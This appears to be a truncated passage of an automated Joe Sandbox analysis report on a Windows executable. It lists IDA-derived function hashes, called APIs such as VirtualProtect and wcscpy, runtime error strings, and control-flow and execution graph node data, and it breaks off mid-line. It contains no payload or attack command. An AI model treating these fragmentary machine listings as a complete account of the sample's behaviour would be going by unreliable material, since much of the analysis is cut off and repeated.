                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                                                                • String ID: 0$X$`
                                                                                                                                • API String ID: 329590056-2527496196
                                                                                                                                • Opcode ID: 73b8facca07f18b68e92b401106acb6fe4b688db2f34678af24554f96c8baf17
                                                                                                                                • Instruction ID: cd016739dbe571725526d87e2366327d8cf2af4bdb259625e44f3c23b4826714
                                                                                                                                • Opcode Fuzzy Hash: 73b8facca07f18b68e92b401106acb6fe4b688db2f34678af24554f96c8baf17
                                                                                                                                • Instruction Fuzzy Hash: 6B02AF22A18BC181E770AB29E8413AAB7A0FB847D4F844339DA9C47BE5DF7CD146C714
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF7970CA544,00007FF7970CA544,?,?,00007FF7970C0000,?,00007FF7970C1991), ref: 00007FF7970C1C63
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF7970CA544,00007FF7970CA544,?,?,00007FF7970C0000,?,00007FF7970C1991), ref: 00007FF7970C1CC7
                                                                                                                                • memcpy.MSVCRT ref: 00007FF7970C1CE0
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF7970CA544,00007FF7970CA544,?,?,00007FF7970C0000,?,00007FF7970C1991), ref: 00007FF7970C1D23
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                • API String ID: 2595394609-2123141913
                                                                                                                                • Opcode ID: 3d18c3b7de528b8c2532974eee19190ff737302e56c317f9bdcb1d1b86b99ac6
                                                                                                                                • Instruction ID: ca762d053efe0767f89b005373d784d2db0127364aa710fab59fff06c1431e1c
                                                                                                                                • Opcode Fuzzy Hash: 3d18c3b7de528b8c2532974eee19190ff737302e56c317f9bdcb1d1b86b99ac6
                                                                                                                                • Instruction Fuzzy Hash: 0141A1A1A08A4285EA34BB69D8856B8A7A0FF45BD4FD84136DD0DC7791DE3CE547C320
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3326252324-0
                                                                                                                                • Opcode ID: bfa330a8e7567c45bb6eeb6004d2cf22d76c654860d4c54795f142723b4c1d99
                                                                                                                                • Instruction ID: 9ee6784b34a99780622c61ec69a30116a2ffd7cfc4100570060b31982e42b001
                                                                                                                                • Opcode Fuzzy Hash: bfa330a8e7567c45bb6eeb6004d2cf22d76c654860d4c54795f142723b4c1d99
                                                                                                                                • Instruction Fuzzy Hash: 2221EF60B0965296FA39BB39ED45375A2A0BF11BD4FC90139C90D87BA0DF3CA8478324
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 642 7ff7970c1e10-7ff7970c1e2d 643 7ff7970c1e2f-7ff7970c1e38 642->643 644 7ff7970c1e3e-7ff7970c1e48 642->644 643->644 645 7ff7970c1f60-7ff7970c1f69 643->645 646 7ff7970c1ea3-7ff7970c1ea8 644->646 647 7ff7970c1e4a-7ff7970c1e53 644->647 646->645 650 7ff7970c1eae-7ff7970c1eb3 646->650 648 7ff7970c1e55-7ff7970c1e60 647->648 649 7ff7970c1ecc-7ff7970c1ed1 647->649 648->646 651 7ff7970c1f23-7ff7970c1f2d 649->651 652 7ff7970c1ed3-7ff7970c1ee2 signal 649->652 653 7ff7970c1eb5-7ff7970c1eba 650->653 654 7ff7970c1efb-7ff7970c1f0a call 7ff7970c8990 650->654 655 7ff7970c1f2f-7ff7970c1f3f 651->655 656 7ff7970c1f43-7ff7970c1f45 651->656 652->651 657 7ff7970c1ee4-7ff7970c1ee8 652->657 653->645 659 7ff7970c1ec0 653->659 654->651 664 7ff7970c1f0c-7ff7970c1f10 654->664 663 7ff7970c1f5a 655->663 656->645 660 7ff7970c1eea-7ff7970c1ef9 signal 657->660 661 7ff7970c1f4e-7ff7970c1f53 657->661 659->651 660->645 661->663 663->645 665 7ff7970c1f12-7ff7970c1f21 signal 664->665 666 7ff7970c1f55 664->666 665->645 665->651 666->663
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CCG
                                                                                                                                • API String ID: 0-1584390748
                                                                                                                                • Opcode ID: f19f7e4d22e570e6dd8561646915369d43160838e68a9c64e1e50922dc2e145a
                                                                                                                                • Instruction ID: 179753cf37c1d8c7e5b8c169ee81cae521ab01241fee03fcb320f320175f1f08
                                                                                                                                • Opcode Fuzzy Hash: f19f7e4d22e570e6dd8561646915369d43160838e68a9c64e1e50922dc2e145a
                                                                                                                                • Instruction Fuzzy Hash: 62218EA1E0810642FA79733C959137991859F847E4FAD8539EB1DC33D4DF6CE8838265
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 667 7ff7970c1880-7ff7970c189c 668 7ff7970c18a2-7ff7970c18f9 call 7ff7970c2420 call 7ff7970c2660 667->668 669 7ff7970c1a0f-7ff7970c1a1f 667->669 668->669 674 7ff7970c18ff-7ff7970c1910 668->674 675 7ff7970c1912-7ff7970c191c 674->675 676 7ff7970c193e-7ff7970c1941 674->676 677 7ff7970c191e-7ff7970c1929 675->677 678 7ff7970c194d-7ff7970c1954 675->678 676->678 679 7ff7970c1943-7ff7970c1947 676->679 677->678 680 7ff7970c192b-7ff7970c193a 677->680 682 7ff7970c1956-7ff7970c1961 678->682 683 7ff7970c199e-7ff7970c19a6 678->683 679->678 681 7ff7970c1a20-7ff7970c1a26 679->681 680->676 685 7ff7970c1b87-7ff7970c1b98 call 7ff7970c1d40 681->685 686 7ff7970c1a2c-7ff7970c1a37 681->686 687 7ff7970c1970-7ff7970c199c call 7ff7970c1ba0 682->687 683->669 684 7ff7970c19a8-7ff7970c19c1 683->684 688 7ff7970c19df-7ff7970c19e7 684->688 686->683 689 7ff7970c1a3d-7ff7970c1a5f 686->689 687->683 692 7ff7970c19d0-7ff7970c19dd 688->692 693 7ff7970c19e9-7ff7970c1a0d VirtualProtect 688->693 694 7ff7970c1a7d-7ff7970c1a97 689->694 692->669 692->688 693->692 697 7ff7970c1b74-7ff7970c1b82 call 7ff7970c1d40 694->697 698 7ff7970c1a9d-7ff7970c1afa 694->698 697->685 704 7ff7970c1b22-7ff7970c1b26 698->704 705 7ff7970c1afc-7ff7970c1b0e 698->705 706 7ff7970c1a70-7ff7970c1a77 704->706 707 7ff7970c1b2c-7ff7970c1b30 704->707 708 7ff7970c1b10-7ff7970c1b20 705->708 709 7ff7970c1b5c-7ff7970c1b6c 705->709 706->683 706->694 707->706 710 7ff7970c1b36-7ff7970c1b53 call 7ff7970c1ba0 707->710 708->704 708->709 709->697 711 7ff7970c1b6f call 7ff7970c1d40 709->711 710->709 711->697
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7970C1247), ref: 00007FF7970C19F9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                • API String ID: 544645111-395989641
                                                                                                                                • Opcode ID: 6b1457c515752b5b4e62840a941f6cff9dd6a3b0c4a35bab41477e059e1fb52e
                                                                                                                                • Instruction ID: 7bf53d34dd772319cdbc13e974653e034c848bb0ca2ae884b59c6253a2d3072d
                                                                                                                                • Opcode Fuzzy Hash: 6b1457c515752b5b4e62840a941f6cff9dd6a3b0c4a35bab41477e059e1fb52e
                                                                                                                                • Instruction Fuzzy Hash: B2516B61F18546DAEB24AB39D8417B8A761EB05BE8F884235D91D877A4CF3CE487C720
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 714 7ff7970c1800-7ff7970c1810 715 7ff7970c1812-7ff7970c1822 714->715 716 7ff7970c1824 714->716 717 7ff7970c182b-7ff7970c1867 call 7ff7970c2290 fprintf 715->717 716->717
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: fprintf
                                                                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                • API String ID: 383729395-3474627141
                                                                                                                                • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                                                                                                • Instruction ID: 7a6c393fc3fab357736cb8130faa400704e4b66cb79742cacb4f96928d147004
                                                                                                                                • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                                                                                                • Instruction Fuzzy Hash: D3F0C222E1CA4582E630BB38A9420BDE361EB4A7D0F889231DE4DD3651DF2CF1838310
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 682475483-0
                                                                                                                                • Opcode ID: ec80baa5ded7c444bf3111a5126438c48ddbad04e2109eafd4d1709760d93b29
                                                                                                                                • Instruction ID: 1f8a1d74c6093170f97328617a75b2b7802d656bbe90554f01da9ca0223744c1
                                                                                                                                • Opcode Fuzzy Hash: ec80baa5ded7c444bf3111a5126438c48ddbad04e2109eafd4d1709760d93b29
                                                                                                                                • Instruction Fuzzy Hash: FF01E125B0965286F639BB39ED052749260BF14BD5FC90135CD0D83B94DF3CE9578220
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:3.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:1620
                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                execution_graph 4407 7ff74f58219e 4408 7ff74f5821ab EnterCriticalSection 4407->4408 4409 7ff74f582272 4407->4409 4410 7ff74f582265 LeaveCriticalSection 4408->4410 4412 7ff74f5821c8 4408->4412 4410->4409 4411 7ff74f5821e9 TlsGetValue GetLastError 4411->4412 4412->4410 4412->4411 4355 7ff74f581e65 4356 7ff74f581e67 signal 4355->4356 4357 7ff74f581e7c 4356->4357 4358 7ff74f581e99 4356->4358 4357->4358 4359 7ff74f581e82 signal 4357->4359 4359->4358 4326 7ff74f582104 4327 7ff74f582218 4326->4327 4328 7ff74f582111 EnterCriticalSection 4326->4328 4329 7ff74f582272 4327->4329 4331 7ff74f582241 DeleteCriticalSection 4327->4331 4334 7ff74f582230 free 4327->4334 4330 7ff74f58220b LeaveCriticalSection 4328->4330 4333 7ff74f58212e 4328->4333 4330->4327 4331->4329 4332 7ff74f58214d TlsGetValue GetLastError 4332->4333 4333->4330 4333->4332 4334->4331 4334->4334 4376 7ff74f581ac3 4377 7ff74f581ade 4376->4377 4378 7ff74f58199e 4377->4378 4379 7ff74f581b36 4377->4379 4381 7ff74f581a0f 4377->4381 4378->4381 4382 7ff74f5819e9 VirtualProtect 4378->4382 4380 7ff74f581ba0 4 API calls 4379->4380 4383 7ff74f581b53 4380->4383 4382->4378 4383->4383 2734 7ff74f581140 2737 7ff74f581160 2734->2737 2736 7ff74f581156 2738 7ff74f58118b 2737->2738 2739 7ff74f5811b9 2737->2739 2738->2739 2742 7ff74f581190 2738->2742 2740 7ff74f5811c7 _amsg_exit 2739->2740 2741 7ff74f5811d3 2739->2741 2740->2741 2744 7ff74f581201 _initterm 2741->2744 2745 7ff74f58121a 2741->2745 2742->2739 2743 7ff74f5811a0 Sleep 2742->2743 2743->2739 2743->2742 2744->2745 2762 7ff74f581880 2745->2762 2747 7ff74f581247 SetUnhandledExceptionFilter 2748 7ff74f58126a 2747->2748 2749 7ff74f58126f malloc 2748->2749 2750 7ff74f58128b 2749->2750 2753 7ff74f5812d2 2749->2753 2751 7ff74f5812a0 strlen malloc memcpy 2750->2751 2751->2751 2752 7ff74f5812d0 2751->2752 2752->2753 2769 7ff74f583b50 2753->2769 2755 7ff74f581315 2756 7ff74f581344 2755->2756 2757 7ff74f581324 2755->2757 2760 7ff74f581160 94 API calls 2756->2760 2758 7ff74f58132d _cexit 2757->2758 2759 7ff74f581338 2757->2759 2758->2759 2759->2736 2761 7ff74f581366 2760->2761 2761->2736 2763 7ff74f5818a2 2762->2763 2766 7ff74f581a0f 2762->2766 2764 7ff74f581956 2763->2764 2765 7ff74f58199e 2763->2765 2763->2766 2764->2765 2947 7ff74f581ba0 2764->2947 2765->2766 2768 7ff74f5819e9 VirtualProtect 2765->2768 2766->2747 2768->2765 2772 7ff74f583b66 2769->2772 2770 7ff74f583c60 wcslen 2957 7ff74f58153f 2770->2957 2772->2770 2776 7ff74f583d60 2779 7ff74f583d7a memset wcscat memset 2776->2779 2781 7ff74f583dd3 2779->2781 2782 7ff74f583e23 wcslen 2781->2782 2783 7ff74f583e35 2782->2783 2787 7ff74f583e7c 2782->2787 2784 7ff74f583e50 _wcsnicmp 2783->2784 2785 7ff74f583e66 wcslen 2784->2785 2784->2787 2785->2784 2785->2787 2786 7ff74f583edd wcscpy wcscat memset 2789 7ff74f583f1c 2786->2789 2787->2786 2788 7ff74f584024 wcscpy wcscat 2790 7ff74f58404f memset 2788->2790 2794 7ff74f584131 2788->2794 2789->2788 2791 7ff74f584070 2790->2791 2792 7ff74f5840d3 wcslen 2791->2792 2793 7ff74f5840e9 2792->2793 2802 7ff74f58412c 2792->2802 2796 7ff74f584100 _wcsnicmp 2793->2796 3137 7ff74f582df0 2794->3137 2797 7ff74f584116 wcslen 2796->2797 2796->2802 2797->2796 2797->2802 2798 7ff74f584376 wcscpy wcscat _wcsicmp 2799 7ff74f5843aa 2798->2799 2800 7ff74f5843c3 memset 2798->2800 3149 7ff74f5814d6 2799->3149 2803 7ff74f5843e4 2800->2803 2802->2798 2804 7ff74f584429 wcscpy wcscat memset 2803->2804 2805 7ff74f58446f 2804->2805 2806 7ff74f5844d2 wcscpy wcscat memset 2805->2806 2808 7ff74f584518 2806->2808 2807 7ff74f584548 wcscpy wcscat 2809 7ff74f586766 memcpy 2807->2809 2810 7ff74f58457a 2807->2810 2808->2807 2809->2810 2811 7ff74f582df0 11 API calls 2810->2811 2812 7ff74f58472d 2811->2812 2813 7ff74f582df0 11 API calls 2812->2813 2814 7ff74f584845 memset 2813->2814 2816 7ff74f584866 2814->2816 2815 7ff74f5848a9 wcscpy wcscat memset 2817 7ff74f5848f2 2815->2817 2816->2815 2818 7ff74f584935 wcscpy wcscat wcslen 2817->2818 3200 7ff74f58146d 2818->3200 2821 7ff74f584a49 2824 7ff74f584b43 wcslen 2821->2824 2831 7ff74f584d34 2821->2831 3364 7ff74f58157b 2824->3364 2826 7ff74f58145e 2 API calls 2826->2821 2828 7ff74f584c02 2830 7ff74f584d13 memset 2828->2830 2832 7ff74f584ca6 wcslen 2828->2832 2830->2831 2833 7ff74f584da4 wcscpy wcscat 2831->2833 3402 7ff74f5815e4 2832->3402 2835 7ff74f584dd6 2833->2835 2837 7ff74f582df0 11 API calls 2835->2837 2839 7ff74f584ede 2837->2839 2838 7ff74f58145e 2 API calls 2838->2830 2840 7ff74f582df0 11 API calls 2839->2840 2841 7ff74f584fef 2840->2841 2842 7ff74f582df0 11 API calls 2841->2842 2844 7ff74f5850d9 2842->2844 2843 7ff74f582df0 11 API calls 2846 7ff74f5851c3 2843->2846 2844->2843 2845 7ff74f585304 wcslen 2847 7ff74f58157b 2 API calls 2845->2847 2846->2845 2848 7ff74f58538e 2847->2848 2849 7ff74f585396 memset 2848->2849 2853 7ff74f5854a8 2848->2853 2851 7ff74f5853b7 2849->2851 2850 7ff74f585407 wcslen 3405 7ff74f5815a8 2850->3405 2851->2850 2852 7ff74f582df0 11 API calls 2860 7ff74f585553 2852->2860 2853->2852 2862 7ff74f585647 _wcsicmp 2853->2862 2856 7ff74f58549c 2858 7ff74f58145e 2 API calls 2856->2858 2857 7ff74f585477 _wcsnicmp 2857->2856 2863 7ff74f585ce1 2857->2863 2858->2853 2859 7ff74f582df0 11 API calls 2859->2862 2860->2859 2861 7ff74f585d3e wcslen 2865 7ff74f5815a8 2 API calls 2861->2865 2864 7ff74f585662 memset 2862->2864 2879 7ff74f5859e5 2862->2879 2863->2861 2870 7ff74f585686 2864->2870 2866 7ff74f585d9a 2865->2866 2868 7ff74f58145e 2 API calls 2866->2868 2867 7ff74f5856cb wcscpy wcscat wcslen 2871 7ff74f58146d 2 API calls 2867->2871 2868->2853 2869 7ff74f585aec wcslen 2872 7ff74f58153f 2 API calls 2869->2872 2870->2867 2873 7ff74f585798 2871->2873 2874 7ff74f585b77 2872->2874 3416 7ff74f581530 2873->3416 2876 7ff74f58145e 2 API calls 2874->2876 2878 7ff74f585b88 2876->2878 2888 7ff74f585c1f 2878->2888 3662 7ff74f582f70 2878->3662 2879->2869 2880 7ff74f586f3c 2882 7ff74f58145e 2 API calls 2880->2882 2881 7ff74f5857d6 3455 7ff74f5814a9 2881->3455 2885 7ff74f586f48 2882->2885 2884 7ff74f585c7c wcslen 2889 7ff74f585c92 2884->2889 2911 7ff74f585cdc 2884->2911 2885->2755 2888->2884 2893 7ff74f585cb0 _wcsnicmp 2889->2893 2890 7ff74f585872 2892 7ff74f58145e 2 API calls 2890->2892 2891 7ff74f585bb5 3666 7ff74f5838e0 2891->3666 2896 7ff74f585866 2892->2896 2897 7ff74f585cc6 wcslen 2893->2897 2893->2911 3593 7ff74f583350 memset 2896->3593 2897->2893 2897->2911 2900 7ff74f585e49 memset wcscpy wcscat 2905 7ff74f582f70 2 API calls 2900->2905 2901 7ff74f58585a 2906 7ff74f58145e 2 API calls 2901->2906 2902 7ff74f5814c7 2 API calls 2903 7ff74f585c11 2902->2903 2903->2888 2909 7ff74f58145e 2 API calls 2903->2909 2908 7ff74f585ea0 2905->2908 2906->2896 2912 7ff74f583350 11 API calls 2908->2912 2909->2888 2911->2900 2913 7ff74f585eb8 2912->2913 2914 7ff74f5814c7 2 API calls 2913->2914 2915 7ff74f585ee6 memset 2914->2915 2919 7ff74f585f07 2915->2919 2916 7ff74f5858c1 2917 7ff74f582df0 11 API calls 2916->2917 2925 7ff74f58594a 2917->2925 2918 7ff74f585f57 wcslen 2920 7ff74f585fa7 wcscat memset 2918->2920 2921 7ff74f585f69 2918->2921 2919->2918 2928 7ff74f585fe1 2920->2928 2922 7ff74f585f80 _wcsnicmp 2921->2922 2922->2920 2924 7ff74f585f92 wcslen 2922->2924 2924->2920 2924->2922 2926 7ff74f582df0 11 API calls 2925->2926 2927 7ff74f58420b 2926->2927 2927->2755 2929 7ff74f586051 wcscpy wcscat 2928->2929 2931 7ff74f586083 2929->2931 2930 7ff74f586eb0 memcpy 2933 7ff74f5861c0 2930->2933 2931->2930 2931->2933 2932 7ff74f58632d wcslen 2934 7ff74f58153f 2 API calls 2932->2934 2933->2932 2935 7ff74f5863b8 2934->2935 2936 7ff74f58145e 2 API calls 2935->2936 2937 7ff74f5863c9 2936->2937 2938 7ff74f586468 2937->2938 2940 7ff74f582f70 2 API calls 2937->2940 2939 7ff74f58145e 2 API calls 2938->2939 2939->2927 2941 7ff74f5863f6 2940->2941 2942 7ff74f5838e0 11 API calls 2941->2942 2943 7ff74f586422 2942->2943 2944 7ff74f5814c7 2 API calls 2943->2944 2945 7ff74f58645a 2944->2945 2945->2938 2946 7ff74f58145e 2 API calls 2945->2946 2946->2938 2949 7ff74f581bc2 2947->2949 2948 7ff74f581c04 memcpy 2948->2764 2949->2948 2951 7ff74f581c45 VirtualQuery 2949->2951 2952 7ff74f581cf4 2949->2952 2951->2952 2956 7ff74f581c72 2951->2956 2953 7ff74f581d23 GetLastError 2952->2953 2954 7ff74f581d37 2953->2954 2955 7ff74f581ca4 VirtualProtect 2955->2948 2955->2953 2956->2948 2956->2955 3689 7ff74f581394 2957->3689 2959 7ff74f58154e 2960 7ff74f581394 2 API calls 2959->2960 2961 7ff74f581558 2960->2961 2962 7ff74f58155d 2961->2962 2963 7ff74f581394 2 API calls 2961->2963 2964 7ff74f581394 2 API calls 2962->2964 2963->2962 2965 7ff74f581567 2964->2965 2966 7ff74f58156c 2965->2966 2967 7ff74f581394 2 API calls 2965->2967 2968 7ff74f581394 2 API calls 2966->2968 2967->2966 2969 7ff74f581576 2968->2969 2970 7ff74f58157b 2969->2970 2971 7ff74f581394 2 API calls 2969->2971 2972 7ff74f581394 2 API calls 2970->2972 2971->2970 2973 7ff74f581585 2972->2973 2974 7ff74f58158a 2973->2974 2975 7ff74f581394 2 API calls 2973->2975 2976 7ff74f581394 2 API calls 2974->2976 2975->2974 2977 7ff74f581599 2976->2977 2978 7ff74f581394 2 API calls 2977->2978 2979 7ff74f5815a3 2978->2979 2980 7ff74f581394 2 API calls 2979->2980 2981 7ff74f5815a8 2980->2981 2982 7ff74f581394 2 API calls 2981->2982 2983 7ff74f5815b7 2982->2983 2984 7ff74f581394 2 API calls 2983->2984 2985 7ff74f5815c6 2984->2985 2986 7ff74f581394 2 API calls 2985->2986 2987 7ff74f5815d5 2986->2987 2988 7ff74f581394 2 API calls 2987->2988 2989 7ff74f5815e4 2988->2989 2990 7ff74f581394 2 API calls 2989->2990 2991 7ff74f5815f3 2990->2991 2991->2927 2992 7ff74f581503 2991->2992 2993 7ff74f581394 2 API calls 2992->2993 2994 7ff74f581512 2993->2994 2995 7ff74f581394 2 API calls 2994->2995 2996 7ff74f581521 2995->2996 2997 7ff74f581530 2996->2997 2998 7ff74f581394 2 API calls 2996->2998 2999 7ff74f581394 2 API calls 2997->2999 2998->2997 3000 7ff74f58153a 2999->3000 3001 7ff74f58153f 3000->3001 3002 7ff74f581394 2 API calls 3000->3002 3003 7ff74f581394 2 API 